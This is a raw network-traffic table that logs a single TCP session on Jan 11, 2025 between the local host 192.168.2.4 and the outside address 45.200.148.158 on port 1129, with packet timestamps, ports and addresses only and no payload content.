Jan 11, 2025 20:26:06.473279953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.473285913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.473293066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.473304987 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.473306894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.473320961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.473335028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.473342896 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.473349094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.473361969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.473418951 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.473984003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.473998070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474040985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.474131107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474144936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474157095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474172115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474184990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.474185944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474200010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474208117 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.474214077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474227905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474241018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474253893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474267960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474267960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.474282026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.474287033 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.474325895 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.505357027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.505382061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.505397081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.505428076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.505480051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.505495071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.505508900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.505536079 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.505563974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.505693913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.505743027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.505790949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.558892012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.558919907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.558933973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559000015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.559077024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559091091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559104919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559118986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559139967 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.559170008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.559346914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559360981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559375048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559390068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559408903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.559437037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.559623003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559643984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559657097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559670925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559684992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.559691906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.559724092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.559724092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.559999943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560014009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560028076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560043097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560056925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560058117 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.560079098 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.560434103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560447931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560461044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560475111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560488939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.560516119 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.560719967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560734987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560755014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560769081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560771942 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.560781956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560796022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560801983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.560810089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560818911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.560823917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560837984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560852051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.560874939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.560874939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.561538935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561553001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561567068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561579943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561599970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561608076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.561613083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561626911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561630964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.561640024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561647892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.561654091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561662912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.561676979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561691046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561706066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.561721087 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.561763048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.562275887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562289953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562303066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562316895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562345982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.562371016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.562382936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562397003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562411070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562424898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562438011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562439919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.562452078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562458992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.562465906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562479973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.562479973 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.562514067 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563149929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563163996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563177109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563190937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563198090 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563205004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563220978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563224077 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563262939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563699007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563713074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563726902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563740015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563751936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563752890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563766956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563775063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563780069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563793898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563796997 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563807964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563822031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563823938 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563834906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563849926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563855886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563879013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.563891888 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.563946009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.564493895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564508915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564558983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.564587116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564601898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564615011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564629078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564641953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564647913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.564656973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564670086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564683914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.564703941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.564703941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.564739943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.565290928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565305948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565319061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565346956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565346956 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.565361023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565382957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565397024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565409899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565423965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565438032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565452099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565459013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565465927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.565531015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.565531015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.565531015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.565531015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.596121073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.596142054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.596174955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.596178055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.596225977 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.596271992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.596286058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.596328974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.596368074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.596383095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.596396923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.596453905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.650105953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650149107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650192976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.650223970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650238991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650262117 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.650362968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650398016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.650415897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650515079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650528908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650542974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650574923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.650723934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650738955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650782108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.650935888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650949955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650964022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650978088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650991917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.650999069 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.651005983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651020050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651021957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.651035070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651041985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.651073933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.651464939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651479006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651499987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651513100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651515961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.651549101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.651707888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651721954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651735067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651750088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.651757002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.651787996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.652096987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652111053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652123928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652137995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652144909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.652152061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652164936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652179003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652180910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.652193069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652200937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.652205944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652220964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652223110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.652261019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.652812004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652826071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652839899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652853966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652868032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652882099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652894974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652909040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652921915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652935982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652949095 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.652950048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652962923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652976990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.652978897 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.653007030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.653832912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653846979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653861046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653875113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653887033 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.653887987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653902054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653908014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.653915882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653920889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.653929949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653944016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653947115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.653956890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653970957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653980970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.653985023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.653997898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654012918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654017925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.654036999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.654635906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654649973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654664040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654690027 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.654712915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.654728889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654742956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654756069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654771090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654777050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.654786110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654799938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654810905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.654820919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654834986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.654855013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.654875040 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.655533075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655548096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655560970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655574083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655587912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655589104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.655601025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655615091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655627012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.655627966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655638933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.655642033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655657053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655662060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.655669928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655683994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655697107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.655697107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.655718088 CET	49730	1129	192.168.2.4	45.200.148.158
